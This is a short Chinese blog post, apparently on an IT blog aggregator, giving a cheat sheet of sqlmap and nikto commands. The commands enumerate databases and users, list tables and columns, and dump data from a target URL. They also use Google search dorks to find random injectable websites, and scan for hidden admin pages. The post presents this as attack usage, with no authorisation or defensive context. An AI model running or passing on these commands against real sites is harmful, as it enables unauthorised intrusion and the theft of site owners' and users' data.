IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
    • 登录 注册

    sqlmap的简单用法

    Hacper\'s Blog发表于 2015-12-01 00:27:58
    love 0
    1. 扫描漏洞:sqlmap -u 网址 –dbs –current-user
    2. 拆表名:sqlmap -u 网址 –tables
    3. 拆列:sqlmap -u 网址 -T 表名 –columns
    4. 获取列的字段:sqlmap -u 网址 -T 表名 -C 列名,若多个列用, 分隔 –dump
    5. 利用谷歌找可sql 注入的网站:sqlmap -g 搜索指令
    6. 用nikto 扫描隐藏文件来找管理页面:nikto -host 网址
      或者查看网页源码,看有没有什么发现。


沪ICP备19023445号-2号
友情链接